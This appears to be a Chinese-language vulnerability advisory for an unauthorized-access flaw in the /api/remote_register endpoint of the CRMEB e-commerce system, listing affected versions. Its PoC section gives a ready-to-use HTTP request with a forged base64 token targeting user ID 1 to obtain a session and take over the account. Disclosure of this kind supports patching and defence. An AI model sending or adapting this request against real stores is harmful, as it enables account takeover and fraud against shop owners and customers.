CRMEB /api/remote_register 权限绕过漏洞

2026-09-29 PoC Public

Description

CRMEB 是一套基于 PHP 的开源电商零售分销管理系统,提供商城、分销、多商户等零售电商能力,广泛应用于电商零售场景。其 /api/remote_register 登录注册接口存在未授权访问缺陷,攻击者无需有效凭据即可调用该接口,在已知用户标识存在时修改其积分信息并获取可用的会话令牌,实现对目标账号的越权接管。漏洞影响 v5.4.0、v5.6.1、v5.6.3.1、v6.0.0 等版本,PoC/EXP 与在野利用均已公开。

PoC

GET /api/remote_register?remote_token=eyJ1aWQiOjEsInBob25lIjoiIiwibmlja25hbWUiOiJ6enFheCIsImF2YXRhciI6IiIsIm5vd19tb25leSI6MCwiaW50ZWdyYWwiOjAsImV4cCI6MH0= HTTP/1.1
Host:

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References